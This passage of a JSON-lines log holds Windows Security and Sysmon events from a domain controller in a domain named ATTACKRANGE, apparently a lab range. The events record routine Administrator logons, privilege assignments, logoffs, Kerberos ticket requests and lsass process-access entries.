a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{D65C3B12-F0AD-F3F8-A7DB-D3AB603729DE}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220342,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x46B2D\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{D65C3B12-F0AD-F3F8-A7DB-D3AB603729DE}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x46b2d","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{D65C3B12-F0AD-F3F8-A7DB-D3AB603729DE}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220343,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x46B2D\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x46b2d","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2474,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.109\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.109","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2475,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.109\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.109","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220344,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x46B2D\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x46b2d","LogonType":"3","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2476,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.172\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.172","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220345,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220346,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{D65C3B12-F0AD-F3F8-A7DB-D3AB603729DE}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{D65C3B12-F0AD-F3F8-A7DB-D3AB603729DE}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220347,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{D65C3B12-F0AD-F3F8-A7DB-D3AB603729DE}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{D65C3B12-F0AD-F3F8-A7DB-D3AB603729DE}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220348,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x46B8A\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{D65C3B12-F0AD-F3F8-A7DB-D3AB603729DE}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x46b8a","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{D65C3B12-F0AD-F3F8-A7DB-D3AB603729DE}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
